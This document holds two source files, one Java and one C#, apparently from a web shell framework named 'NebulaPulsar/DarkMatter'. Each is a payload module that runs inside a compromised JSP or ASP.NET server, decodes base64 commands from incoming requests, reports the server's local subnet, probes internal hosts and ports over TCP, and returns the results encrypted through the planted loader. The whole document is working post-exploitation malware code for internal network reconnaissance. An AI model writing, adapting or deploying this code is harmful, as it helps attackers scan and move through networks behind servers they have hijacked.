File: Payload/JSPX/NebulaPulsar/DarkMatter/lan_tools.java
import java.io.*;
import java.lang.reflect.Method;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.NetworkInterface;
import java.net.Socket;
import java.util.Base64;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Map;
import java.nio.charset.StandardCharsets;

public class lan_tools extends ClassLoader
{
    public lan_tools(ClassLoader objParent) { super(objParent); }
    public lan_tools() { super(lan_tools.class.getClassLoader()); }

    private Map<String, String> fnParseParams(String szParamStr)
    {
        Map<String, String> mapParams = new HashMap<String, String>();
        if (szParamStr == null || szParamStr.trim().isEmpty())
            return mapParams;

        String[] aszPairs = szParamStr.split("&");
        for (String szPair : aszPairs)
        {
            int nIdx = szPair.indexOf("=");
            if (nIdx > 0)
            {
                mapParams.put(szPair.substring(0, nIdx), szPair.substring(nIdx + 1));
            }
        }
        return mapParams;
    }

    private void fnWriteOutput(Object objParam, Object objResponse, OutputStream osClient, byte[] abResult)
    {
        if (abResult.length == 0)
            abResult = "DARKMATTER_SUCCESS: Action executed but returned no output".getBytes();

        Object objPageContext = objParam;

        try
        {
            byte[] abEncryptedResult = Encrypt(objParam, abResult);
            osClient.write(abEncryptedResult);
            osClient.flush();

            Method fnSetStatus = objResponse.getClass().getMethod("setStatus", new Class[]{int.class});
            fnSetStatus.invoke(objResponse, new Object[]{200});

            try
            {
                Method fnGetOut = objPageContext.getClass().getMethod("getOut", new Class[0]);
                Object objOut = fnGetOut.invoke(objPageContext, new Object[0]);
                Method fnClear = objOut.getClass().getMethod("clear", new Class[0]);
                fnClear.invoke(objOut, new Object[0]);
            }
            catch (Exception exIgnored) {}

            Method fnFlushBuffer = objResponse.getClass().getMethod("flushBuffer", new Class[0]);
            fnFlushBuffer.invoke(objResponse, new Object[0]);
        }
        catch (Exception exIgnored) {}
    }

    private byte[] Encrypt(Object objPageContext, byte[] abRawResponse)
    {
        try
        {
            if (objPageContext == null)
                return abRawResponse;

            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            Object objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPulsarLoader = fnGetAttribute.invoke(objRequest, new Object[]{"pulsar_loader_instance"});
            
            if (objPulsarLoader == null)
                return abRawResponse;

            java.lang.reflect.Method fnCrypt = objPulsarLoader.getClass().getDeclaredMethod("Crypt", byte[].class, int.class);
            fnCrypt.setAccessible(true);

            return (byte[])fnCrypt.invoke(objPulsarLoader, abRawResponse, 1);
        }
        catch (Exception exCrashed)
        {
            return abRawResponse;
        }
    }

    private String getSubnetInfo() {
        String subnet = "192.168.1"; // Default
        try {
            Enumeration<NetworkInterface> interfaces = NetworkInterface.getNetworkInterfaces();
            while (interfaces.hasMoreElements()) {
                NetworkInterface iface = interfaces.nextElement();
                if (iface.isLoopback() || !iface.isUp()) continue;

                Enumeration<InetAddress> addresses = iface.getInetAddresses();
                while (addresses.hasMoreElements()) {
                    InetAddress addr = addresses.nextElement();
                    if (addr instanceof java.net.Inet4Address) {
                        String ip = addr.getHostAddress();
                        if (!ip.startsWith("127.")) {
                            int lastDot = ip.lastIndexOf('.');
                            if (lastDot > 0) {
                                return ip.substring(0, lastDot);
                            }
                        }
                    }
                }
            }
        } catch (Exception e) {
            
        }
        return subnet;
    }

    @Override
    public boolean equals(Object objParam)
    {
        Object objPageContext = objParam;
        Object objRequest = null;
        Object objResponse = null;
        OutputStream osClient = null;
        
        try
        {
            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetResponse = objPageContext.getClass().getMethod("getResponse", new Class[0]);
            objResponse = fnGetResponse.invoke(objPageContext, new Object[0]);

            Method fnGetOutputStream = objResponse.getClass().getMethod("getOutputStream", new Class[0]);
            osClient = (OutputStream) fnGetOutputStream.invoke(objResponse, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPayload = fnGetAttribute.invoke(objRequest, new Object[]{"payload"});
            Object objLength = fnGetAttribute.invoke(objRequest, new Object[]{"len"});

            if (objPayload == null || objLength == null)
            {
                osClient.write("PAYLOAD_ERROR: Missing attributes from request.".getBytes());
                return true;
            }

            byte[] abPayload = (byte[])objPayload;
            int nClassLength = Integer.parseInt(objLength.toString());
            int nParamOffset = nClassLength + 4;
            int nParamLength = abPayload.length - nParamOffset;
            String szParam = new String(abPayload, nParamOffset, nParamLength, "UTF-8").trim();

            Map<String, String> mapParams = fnParseParams(szParam);
            
            String z0 = mapParams.get("z0");
            if (z0 == null) {
                fnWriteOutput(objParam, objResponse, osClient, "{\"status\":\"error\",\"msg\":\"Missing z0\"}".getBytes());
                return true;
            }
            
            byte[] abDecodedAction = Base64.getDecoder().decode(z0);
            String action = new String(abDecodedAction, StandardCharsets.UTF_8).trim();

            String szResponseResult = "";

            if ("info".equals(action)) {
                String subnet = getSubnetInfo();
                szResponseResult = "{\"status\":\"success\",\"subnet\":\"" + subnet + "\"}";
                
            } else if ("check".equals(action)) {
                String z1 = mapParams.get("z1");
                String z2 = mapParams.get("z2");
                
                if (z1 != null && z2 != null) {
                    String targetIp = new String(Base64.getDecoder().decode(z1), StandardCharsets.UTF_8).trim();
                    String targetPortStr = new String(Base64.getDecoder().decode(z2), StandardCharsets.UTF_8).trim();
                    int targetPort = Integer.parseInt(targetPortStr);
                    
                    boolean isOpen = false;
                    Socket socket = null;
                    try {
                        socket = new Socket();
                        socket.connect(new InetSocketAddress(targetIp, targetPort), 1500);
                        isOpen = true;
                    } catch (Exception ex) {
                        isOpen = false;
                    } finally {
                        if (socket != null) {
                            try { socket.close(); } catch (Exception e) {}
                        }
                    }
                    
                    if (isOpen) {
                        szResponseResult = "{\"open\":true,\"ip\":\"" + targetIp + "\",\"port\":" + targetPort + "}";
                    } else {
                        szResponseResult = "{\"open\":false}";
                    }
                } else {
                    szResponseResult = "{\"open\":false}";
                }
            } else {
                szResponseResult = "{\"status\":\"error\",\"msg\":\"Unknown action\"}";
            }

            fnWriteOutput(objParam, objResponse, osClient, szResponseResult.getBytes(StandardCharsets.UTF_8));
        }
        catch (Exception ex)
        {
            if (osClient != null)
            {
                try
                {
                    StringWriter swTrace = new StringWriter();
                    ex.printStackTrace(new PrintWriter(swTrace));
                    osClient.write(("DARKMATTER_INTERNAL_CRASHED: " + swTrace.toString()).getBytes());
                }
                catch (Exception exIgnored) {}
            }
        }

        return true;
    }
}

File: Payload/ASHX/NebulaPulsar/DarkMatter/lan_tools.cs
using System;
using System.Web;
using System.IO;
using System.Diagnostics;
using System.Text;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Threading;
using System.Net.Sockets;
using System.Net;
using System.Net.NetworkInformation;

public class lan_tools
{
    private Dictionary<string, string> fnParseParams(string szParam)
    {
        Dictionary<string, string> dic = new Dictionary<string, string>();
        if (string.IsNullOrEmpty(szParam))
            return dic;

        string[] pairs = szParam.Split('&');
        foreach (string szPair in pairs)
        {
            int nIdx = szPair.IndexOf("=");
            if (nIdx > 0)
                dic[szPair.Substring(0, nIdx).Trim()] = szPair.Substring(nIdx + 1).Trim();
        }

        return dic;
    }

    private string fnB64Encode(string szInput) => Convert.ToBase64String(Encoding.UTF8.GetBytes(szInput));
    private string fnB64Decode(string szInput) => Encoding.UTF8.GetString(Convert.FromBase64String(szInput));

    private void fnWriteOutput(object driver, HttpResponse response, byte[] abOutput)
    {
        var cryptMethod = driver.GetType().GetMethod("Crypt", new Type[] { typeof(byte[]), typeof(int) });
        byte[] abEncryptedResp = (byte[])cryptMethod.Invoke(driver, new object[] { abOutput, 1 });

        response.Clear();
        response.ContentType = "application/octet-stream";
        response.BinaryWrite(abEncryptedResp);
    }

    private string getSubnetInfo()
    {
        string subnet = "192.168.1";
        try
        {
            foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
            {
                if (ni.NetworkInterfaceType == NetworkInterfaceType.Loopback || ni.OperationalStatus != OperationalStatus.Up)
                    continue;

                IPInterfaceProperties ipProps = ni.GetIPProperties();
                foreach (UnicastIPAddressInformation addr in ipProps.UnicastAddresses)
                {
                    if (addr.Address.AddressFamily == AddressFamily.InterNetwork)
                    {
                        string ip = addr.Address.ToString();
                        if (!ip.StartsWith("127."))
                        {
                            int lastDot = ip.LastIndexOf('.');
                            if (lastDot > 0)
                            {
                                return ip.Substring(0, lastDot);
                            }
                        }
                    }
                }
            }
        }
        catch (Exception)
        {
            
        }
        return subnet;
    }

    public bool Run()
    {
        HttpContext context = HttpContext.Current;
        if (context == null)
            return false;

        HttpRequest request = context.Request;
        HttpResponse response = context.Response;

        try
        {
            byte[] abPayload = (byte[])context.Items["payload"];
            object driver = context.Items["driver"];
            int nDllLength = (int)context.Items["len"];

            int nParamOffset = nDllLength + 4;
            int nParamLength = abPayload.Length - nParamOffset;
            string szParam = Encoding.UTF8.GetString(abPayload, nParamOffset, nParamLength).Trim();

            Dictionary<string, string> dic = fnParseParams(szParam);
            
            if (!dic.ContainsKey("z0"))
            {
                fnWriteOutput(driver, response, Encoding.UTF8.GetBytes("{\"status\":\"error\",\"msg\":\"Missing z0\"}"));
                return true;
            }

            string action = fnB64Decode(dic["z0"]).Trim();
            string szResponseResult = "";

            if (action == "info")
            {
                string subnet = getSubnetInfo();
                szResponseResult = "{\"status\":\"success\",\"subnet\":\"" + subnet + "\"}";
            }
            else if (action == "check")
            {
                if (dic.ContainsKey("z2") && dic.ContainsKey("z3"))
                {
                    string targetIp = fnB64Decode(dic["z2"]).Trim();
                    string targetPortStr = fnB64Decode(dic["z3"]).Trim();
                    int targetPort = int.Parse(targetPortStr);

                    bool isOpen = false;
                    TcpClient tcpClient = null;
                    try
                    {
                        tcpClient = new TcpClient();
                        var connectResult = tcpClient.BeginConnect(targetIp, targetPort, null, null);
                        isOpen = connectResult.AsyncWaitHandle.WaitOne(TimeSpan.FromMilliseconds(1500));
                        if (isOpen)
                        {
                            tcpClient.EndConnect(connectResult);
                        }
                    }
                    catch (Exception)
                    {
                        isOpen = false;
                    }
                    finally
                    {
                        if (tcpClient != null)
                        {
                            tcpClient.Close();
                        }
                    }

                    if (isOpen)
                    {
                        szResponseResult = "{\"open\":true,\"ip\":\"" + targetIp + "\",\"port\":" + targetPort + "}";
                    }
                    else
                    {
                        szResponseResult = "{\"open\":false}";
                    }
                }
                else
                {
                    szResponseResult = "{\"open\":false}";
                }
            }
            else
            {
                szResponseResult = "{\"status\":\"error\",\"msg\":\"Unknown action\"}";
            }

            fnWriteOutput(driver, response, Encoding.UTF8.GetBytes(szResponseResult));
        }
        catch (Exception ex)
        {
            response.Write("DARKMATTER_ERROR: " + ex.Message);
        }

        return true;
    }
}